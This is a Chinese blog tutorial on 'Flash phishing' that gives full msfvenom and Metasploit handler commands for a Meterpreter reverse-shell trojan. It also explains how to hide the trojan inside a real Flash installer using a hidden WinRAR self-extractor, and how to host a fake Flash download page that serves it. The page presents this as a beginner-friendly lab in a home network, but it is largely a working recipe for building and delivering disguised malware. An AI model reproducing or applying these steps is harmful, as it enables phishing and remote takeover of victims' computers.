xss——flash钓鱼 (kali MSF捆绑钓鱼)超详细!小白也可以!

目录

主要环境准备:

整体思路:

详细步骤:

1.在kali中利用MSF生成一个PayLoad

2.kali中开启监听

3.伪装木马

(1)两个⽂件⼀块压缩并更改⽂件名为"Download.exe",点击"⾼级"标签⻚下的"⾃解压选项"填写解压路径为 C:\Windows\Temp

(2)点击"设置"--"解压后运⾏"如下两⾏内容...并在"模式"标签下设置"全部隐藏"...

(3)配置更新⽅式----》解压并更新⽂件⽽覆盖⽅式----覆盖所有⽂件!!

4.搭建flash的网站并修改其下载文件

5.去搭建的网站下载我们的木马并运行

主要环境准备:

kali系统虚拟机(攻击者监听设备、制作木马),Win10物理机(受害者目标主机),winrar压缩软件(用于伪装木马),phpstudy(搭建模拟钓鱼网站)

整体思路:

详细步骤:

1.在kali中利用MSF生成一个PayLoad

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.252.129 LPORT=44
44 -f exe > shell.exe
//192.168.252.129 是你kali监听设备的ip地址 端口我选择的4444 
  • msfvenom: 这是Metasploit框架中的一个工具,用于生成各种类型的payloads。

  • -p: 这个选项用来指定payload类型。在这里,payload类型为windows/x64/meterpreter/reverse_tcp,表示生成的是针对x64架构的Windows系统、使用Meterpreter功能的、通过反向TCP连接回连到攻击者的payload。

  • LHOST=192.168.252.129: 这个参数指定了监听主机的IP地址,payload生成的shellcode将回连到这个IP地址。

  • LPORT=4444: 这个参数指定了监听端口,payload生成的shellcode将尝试在这个端口上建立连接。

  • -f exe: 这个参数指定了输出格式,这里设置为exe,意味着生成的payload将是一个Windows可执行文件。

  • >shell.exe: 这表示输出文件名,msfvenom生成的payload将被保存为名为shell.exe的文件。

运行完会在当前目录下生成一个shell.exe 文件 然后将其拖到你的物理机上 进行后续的伪装捆绑

2.kali中开启监听

上一步我们生成了一个可执行木马 现在我们要在kali 中开启该木马的监听 

在kali 中依次输入以下语句 

msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.252.129
set lport 4444
run
  • msfconsole: 这是启动Metasploit控制台的命令,从这里你可以执行各种渗透测试和安全评估任务。

  • use exploit/multi/handler: 这条命令选择了exploit/multi/handler模块,这是一个通用的监听器模块,可以用来接收任何类型的payload发送的连接请求。

  • set payload windows/x64/meterpreter/reverse_tcp: 这里设置了payload类型为windows/x64/meterpreter/reverse_tcp,这意味着你期望接收到由这种类型payload生成的连接。

  • set lhost 192.168.252.129: 设置监听的IP地址为192.168.252.129,这是你的机器或服务器的本地IP地址,payload将回连到这个地址。

  • set lport 4444: 设置监听的端口号为4444,payload将尝试在这个端口上建立连接。

  • run: 最后运行这个配置好的监听器,开始等待payload的连接。

显示如下就是进入了监听等待连接界面

3.伪装木马

因为我们要将木马伪装到flash的解压包中 所以我们先去flash下载一个真的flash安装包 下载链接在下面 

https://www.flash.cn/download-wins
下载完后我们就有两个文件 一个木马文件一个真的安装包

我们利用winRAR的自定义解压将两个文件合成一个可执行文件

(1)两个⽂件⼀块压缩并更改⽂件名为"Download.exe",点击"⾼级"标签⻚下的"⾃解压选项"填
写解压路径为 C:\Windows\Temp

(2)点击"设置"--"解压后运⾏"如下两⾏内容...并在"模式"标签下设置"全部隐藏"...

(3)配置更新⽅式----》解压并更新⽂件⽽覆盖⽅式----覆盖所有⽂件!!

然后我们就得到了两个文件合一起的可执行文件 

4.搭建flash的网站并修改其下载文件

下载以下项⽬并将其源码⽂件部署在⽹站根⽬录下...稍作修改并访问

https://github.com/crow821/crowsec/tree/master/crowsec_FakeFlash

我们将源码文件部署在网站的WWW根目录下

然后查看了index.html文件中的下载路径 发现其文件名 为了方便我们将我们的木马文件改成他的原本的文件名字 再将其原本正确的文件删掉 就是替换了他正确的下载文件

修改后的样子:

5.去搭建的网站下载我们的木马并运行

记得先运行我们下载搭建好的flash网站

因为搭建在网站根目录下 所以我直接访问了本机

点击下载就会下载咱们的木马文件了

下载下来点击运行 返回kali监听机就会发现目标机已上线 并且可以执行目标电脑的shell 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值